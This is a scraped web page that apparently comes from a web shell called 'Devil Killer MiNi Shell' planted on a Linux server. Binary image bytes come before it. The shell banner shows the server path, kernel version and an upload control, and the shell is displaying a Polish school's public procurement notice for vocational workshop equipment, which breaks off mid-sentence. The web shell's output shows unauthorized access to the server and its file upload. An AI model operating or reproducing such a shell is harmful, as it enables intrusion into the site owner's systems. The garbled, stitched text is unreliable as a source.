JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251013/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251013/0047199801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa wyposażenia do pracowni zawodowych w ramach projektu<br/>„Dobra nauka w Czarnocinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Ustawicznego im. Juliusza Poniatowskiego w Czarnocinie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZS CKU w Czarnocinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000783574</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Juliusza Poniatowskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarnocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-318</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 44 616 51 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zscku@czarnocin.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zscku.czarnocin.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa wyposażenia do pracowni zawodowych w ramach projektu<br/>„Dobra nauka w Czarnocinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0a830a1-6316-47c9-8250-34ecf0cc8598</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00471998</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Dobra nauka w Czarnocinie” współfinansowanego ze środków Unii Europejskiej w ramach programu regionalnego Fundusze Europejskie dla Łódzkiego 2021-2027, Priorytet: FELD.08 Fundusze Europejskie dla Edukacji i Kadr w Łódzkiem, działanie: FELD.08.08 Kształcenie zawodowe </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b0a830a1-6316-47c9-8250-34ecf0cc8598 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej<br/>„RODO”, Zamawiający udziela następujących informacji:<br/>1. Administrator Danych Osobowych - Administratorem danych osobowych jest Zespół Szkół Centrum Kształcenia Ustawicznego im.<br/>Juliusza Poniatowskiego w Czarnocinie ul. J. Poniatowskiego 5, 97-318 Czarnocin nr tel. : +48 44 616 51 23 nr faksu: +48 44 616 51<br/>23 adres strony internetowej: https://zsrczarnocin.bip.net.pl / REGON: 368179028 NIP: 7711003114.<br/>2. Administrator wyznaczył Inspektora Ochrony - We wszystkich sprawach związanych z przetwarzaniem danych osobowych można<br/>się kontaktować z Inspektorem Ochrony Danych za pomocą poczty elektronicznej pod adresem: aus-safety@protonmail.com<br/>3. Cel przetwarzania danych osobowych- Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie art. 275 ustawy<br/>Prawo Zamówień Publicznych w trybie podstawowym. Przetwarzanie danych osobowych odbywać się będzie na podstawie art. 6<br/>ust. 1 lit. b i c RODO. Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach: a) ustawa z dnia 11<br/>września 2019 r. Prawo Zamówień Publicznych, b) ustawa z dnia 23 kwietnia 1964 r. – Kodeks cywilny, c) ustawa z dnia 27 sierpnia<br/>2009 r. o finansach publicznych.<br/>4. Odbiorcy danych osobowych -Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Prawo Zamówień Publicznych (t.j. Dz.U. 2019 poz. 2019 ze zm.).<br/>5. Okres przechowywania danych osobowych - Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,<br/>przez okres 4 lat, licząc od pierwszego stycznia roku następnego po roku, w którym sprawa została zakończona, a następnie,<br/>zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach przez okres 5 lat w przypadku<br/>dokumentacji postępowania oraz 10 lat w związku z zawartą umową, zgodnie z kategorią archiwalną B5 oraz B10, a w przypadku<br/>zmiany kategorii archiwalnej dokumentacji przez okres zgodny ze zmienioną kategoria archiwalną dokumentacji. W przypadku<br/>zamówień publicznych współfinansowanych ze środków funduszy europejskich lub z innych środków niż pochodzące z budżetu Unii<br/>Europejskiej na podstawie odrębnych przepisów w tym zakresie, do 25 lat.<br/>6. Obowiązek podania danych - Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Prawa Zamówień Publicznych związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. W odniesieniu do Pana/Pani danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>Posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, z zastrzeżeniem przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych z zastrzeżeniem, iż uprawnienie do<br/>sprostowania lub uzupełnienia danych osobowych, o których mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO oraz z zastrzeżeniem iż<br/>żądanie, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu;<br/>Ogłoszenie nr 2025/BZP 00435174 z dnia 2025-09-22<br/>2025-09-22 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>Prawo wniesienia skargi do organu nadzorczego - Przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego na<br/>niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez Administratora. Organem właściwym dla przedmiotowej<br/>skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, tel. 22 531 03 00, gdy uzna Pani/Pan, iż<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>Konsekwencje niepodania danych osobowych - W przypadku nie podania danych osobowych – nie będzie możliwości zawarcia i<br/>realizacji umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">I.2611.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Zakup, dostawa i montaż wyposażenia do pracowni projektowania i architektury krajobrazu oraz pracowni<br/>rolniczej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48760000-3 - Pakiety oprogramowania do ochrony antywirusowej</p> <p class="mb-0">30123000-7 - Maszyny biurowe i przemysłowe</p> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wyboru Wykonawcy Zamawiający dokona w oparciu o następujące kryteria:<br/>Opis kryteriów Znaczenie<br/>A CENA 60<br/>B OKRES GWARANCJI 30<br/>C Aspekt społeczny - integracja społeczna i zawodowa<br/>osób z grup zagrożonych wykluczeniem społecznym 10<br/>Zamawiający dokona oceny wg następującego wzoru:<br/>Pc = A + B + C<br/>Pc – wartość punktowa badanej oferty<br/>A/ Kryterium: „Cena” za wykonanie zadania – maksymalna ilość punktów wynosi 60.<br/>Zastosowanie będzie miał następujący wzór:<br/>cena brutto oferty najtańszej<br/>A = ——————————— x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>gdzie:<br/>A- ilość punktów oferty badanej<br/>B/ Kryterium: „Okres udzielonej gwarancji” - maksymalna ilość punktów wynosi 30.<br/>Zastosowanie będzie miał następujący wzór:<br/>okres udzielonej gwarancji badanej oferty<br/>B = —————————————— x 100 pkt x 30%<br/>maksymalny okres gwarancji<br/>gdzie:<br/>B- ilość punktów oferty badanej<br/>UWAGA:<br/>a) wymagany okres gwarancji wynosi 24 miesiące, natomiast maksymalny, punktowany okres gwarancji wynosi 48 miesięcy,<br/>b) w przypadku nie wpisania przez Wykonawcę w Formularzu ofertowym żadnego okresu gwarancji, Zamawiający uzna, że<br/>Wykonawca zaoferował 24-miesięczny okres gwarancji,<br/>c) w przypadku wpisania terminu gwarancji krótszego niż 24 miesiące oferta Wykonawcy zostanie odrzucona jako niezgodna z SWZ,<br/>d) w przypadku wpisania terminu gwarancji przekraczającego 48 miesięcy, dla potrzeb obliczania punktacji zostanie potraktowany<br/>jako maksymalny, wynoszący 48 miesięcy i otrzyma maksymalną liczbę punktów.<br/>C/Kryterium: aspekt społeczny - integracja społeczna i zawodowa osób z grup zagrożonych wykluczeniem społecznym -<br/>maksymalna ilość punktów wynosi10.<br/>W kryterium aspekt społeczny oceniane będzie zatrudnienie do realizacji zamówienia jednej osoby bezrobotnej w rozumieniu ustawy<br/>z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy lub jednej osoby z niepełnosprawnością w rozumieniu<br/>ustawy z dnia27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych<br/>(Dz.U.2025.913t.j.).<br/>Punkty w tym kryterium zostaną przyznane w oparciu o deklarację zatrudnienia złożoną przez Wykonawcę w treści Formularza ofertowego stanowiącego Załącznik nr 3.1/3.2 do SWZ.<br/>Wykonawca otrzyma 10 pkt jeżeli złoży deklarację, że zatrudni do realizacji jedną osobę bezrobotną w rozumieniu ustawy z dnia 20<br/>kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy lub jedną osobę z niepełnosprawnością w rozumieniu ustawy z<br/>dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych.<br/>W przypadku nie złożenia ww. deklaracji o zatrudnieniu wskazanych przez Zamawiającego osób zagrożonych wykluczeniem<br/>społecznym Wykonawca nie otrzyma punktów w tym kryterium.<br/>Zatrudnienie, o którym mowa powyżej powinno nastąpić przed podpisaniem umowy z Zamawiającym i trwać do końca realizacji tego<br/>zamówienia.<br/>Przez „zatrudnienie do realizacji zamówienia” Zamawiający rozumie zatrudnienie do realizacji zamówienia nowej osoby nie będącej<br/>aktualnie pracownikiem Wykonawcy/Podwykonawcy.<br/>W stosunku do osób, które posiadały status osoby bezrobotnej Zamawiający dopuszcza zatrudnienie tej osoby u<br/>Wykonawcy/Podwykonawcy w okresie nie wcześniejszym niż pół roku przed upływem terminu składania ofert w postępowaniu.<br/>Osoba z niepełnosprawnościami to osoba spełniająca warunki uzyskania statusu niepełnosprawności określone w ustawie z dnia 27<br/>sierpnia 1997 r. o rehabilitacji zawodowej społecznej oraz zatrudnianiu osób niepełnosprawnych lub we właściwych przepisach<br/>państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego lub państw, z którymi UE zawarła umowy o<br/>równym traktowaniu przedsiębiorców dostępie do zamówień publicznych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny - integracja społeczna i zawodowa osób z grup zagrożonych wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Zakup, dostawa i montaż wyposażenia sali warsztatowej, pracowni rolniczej, mechanizacji i stolarni </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43812000-8 - Piły</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44512930-0 - Skrzynki narzędziowe</p> <p class="mb-0">44512940-3 - Zestawy narzędziowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wyboru Wykonawcy Zamawiający dokona w oparciu o następujące kryteria:<br/>Opis kryteriów Znaczenie<br/>A CENA 60<br/>B OKRES GWARANCJI 30<br/>C Aspekt społeczny - integracja społeczna i zawodowa<br/>osób z grup zagrożonych wykluczeniem społecznym 10<br/>Zamawiający dokona oceny wg następującego wzoru:<br/>Pc = A + B + C<br/>Pc – wartość punktowa badanej oferty<br/>A/ Kryterium: „Cena” za wykonanie zadania – maksymalna ilość punktów wynosi 60.<br/>Zastosowanie będzie miał następujący wzór:<br/>cena brutto oferty najtańszej<br/>A = ——————————— x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>gdzie:<br/>A- ilość punktów oferty badanej<br/>B/ Kryterium: „Okres udzielonej gwarancji” - maksymalna ilość punktów wynosi 30.<br/>Zastosowanie będzie miał następujący wzór:<br/>okres udzielonej gwarancji badanej oferty<br/>B = —————————————— x 100 pkt x 30%<br/>maksymalny okres gwarancji<br/>gdzie:<br/>B- ilość punktów oferty badanej<br/>UWAGA:<br/>a) wymagany okres gwarancji wynosi 24 miesiące, natomiast maksymalny, punktowany okres gwarancji wynosi 48 miesięcy,<br/>b) w przypadku nie wpisania przez Wykonawcę w Formularzu ofertowym żadnego okresu gwarancji, Zamawiający uzna, że<br/>Wykonawca zaoferował 24-miesięczny okres gwarancji,<br/>c) w przypadku wpisania terminu gwarancji krótszego niż 24 miesiące oferta Wykonawcy zostanie odrzucona jako niezgodna z SWZ,<br/>d) w przypadku wpisania terminu gwarancji przekraczającego 48 miesięcy, dla potrzeb obliczania punktacji zostanie potraktowany<br/>jako maksymalny, wynoszący 48 miesięcy i otrzyma maksymalną liczbę punktów.<br/>C/Kryterium: aspekt społeczny - integracja społeczna i zawodowa osób z grup zagrożonych wykluczeniem społecznym -<br/>maksymalna ilość punktów wynosi10.<br/>W kryterium aspekt społeczny oceniane będzie zatrudnienie do realizacji zamówienia jednej osoby bezrobotnej w rozumieniu ustawy<br/>z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy lub jednej osoby z niepełnosprawnością w rozumieniu<br/>ustawy z dnia27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych<br/>(Dz.U.2025.913t.j.).<br/>Punkty w tym kryterium zostaną przyznane w oparciu o deklarację zatrudnienia złożoną przez Wykonawcę w treści Formularza ofertowego stanowiącego Załącznik nr 3.1/3.2 do SWZ.<br/>Wykonawca otrzyma 10 pkt jeżeli złoży deklarację, że zatrudni do realizacji jedną 